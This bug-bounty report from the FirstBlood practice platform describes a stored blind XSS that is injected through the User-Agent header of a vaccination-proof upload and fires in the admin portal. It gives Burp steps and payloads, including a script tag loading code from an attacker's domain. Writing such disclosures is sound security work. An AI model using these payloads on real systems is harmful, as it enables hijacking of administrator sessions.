FirstBlood-#726[COLLAB with isitbug] Blind XSS through User-Agent header on Vaccination Management portal affecting admins
This issue was discovered on FirstBlood v2.0.0 (issues patched)



On 2021-10-27, shreky Level 5 reported:

Summary

In the Vaccination Management portal,there's information about users who submitted their vaccination proof,from which includes their User-Agent.We can make use of this to exploit a Blind XSS which will hit our XSShunter.com once an admin accesses the dashboard.
However we can also make this XSS not so blind by just injecting for example <script>alert(document.domain)</script> in our User-Agent when uploading a vaccination proof.It will then trigger upon accessing /vaccination-manager/portal.php while being logged in.

Steps to reproduce

Blind way

  1. Inside Burp Suite's match & replace function,in the match section put your User-Agent's value and ""><script src=yourdomain></script> in the replace section
  2. Go to /vaccination-manager/pub/upload-vaccination-proof.php and upload your proof and submit it
  3. Login to the Vaccination Management over at /vaccination-manager/login.php
  4. Once you access the dashboard,check your XSSHunter tab.

Not so blind way

  1. Same as the blind version but injecting <script>alert(document.domain)</script> in our User-Agent when uploading our vaxxination proof.

Impact

Blind XSS that triggers once an admin accesses the Vaccination Management portal/dashboard/panel.

(Blind way) XSSHunter tab -->

(Not so blind way)XSS Triggering -->

P2 High

Endpoint: /vaccination-manager/portal.php

Parameter: User-Agent header

Payload: ""><script src=yourdomain></script>


FirstBlood ID: 29
Vulnerability Type: Stored XSS

When uploading a vaccine proof it is possible to achieve stored XSS against admins set via the user agent. As this value typically can't be user controlled the developers did not think it was 'worth' preventing against XSS.